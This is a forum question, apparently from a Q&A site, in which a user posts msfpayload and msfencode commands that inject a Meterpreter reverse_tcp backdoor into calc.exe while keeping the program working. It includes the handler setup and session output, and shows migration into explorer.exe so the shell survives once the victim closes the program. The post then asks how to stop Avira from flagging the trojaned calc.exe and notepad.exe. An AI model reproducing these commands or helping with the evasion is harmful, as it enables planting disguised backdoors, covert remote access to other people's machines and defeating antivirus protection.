|
HI I WANA KNOW SOME INFO ABOUT THE METASPLOIT METERPRETER INJECTION INTO EXE FILE WITHOUT LOSING EXECUTABLE CONTENET I MEANS I WANT TO msfencode a msfpayload into an existing executable and the new
executable still function like the original. So if you inject into
calc.exe you get calc.exe and your backdoor so i can migrate to a new ID like EXPLORER.EXE when the user closes the CALC.EXE so i typed the following inmy session ~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: \'\\x00\\xff\'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
making our new backdoored executable.
~/trunk$
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R |
./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e
x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695) then migrate away from the backdoored executable process because if they close the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\\user
meterpreter > getpidcurrent pid: 1592
SO MY QUESTION IS THAT WHEN I ENCODE IT ON CALC.EXE AND NOTEPAD.EXE THEY CRASHES DOWN AND THE VIRUS DETECT THE exe signature as its a trojan i dont know why im stuck on that and i kept on encoding them 10 even 20.. times and still the AVIRA detecting them as trojan but when i dont use the ./msfencode -h \"-k Keep template working; run payload in new thread (use with -x) it works fine without trojan detection from avira can any one help on keeping the calc.exe and notepad.exe as they are without losing the content and with no virus detection is it a payload problem that the avira is detecting
 |
أسئلة وأجوبة 
http://www.offensive-security.com/metasploit-unleashed/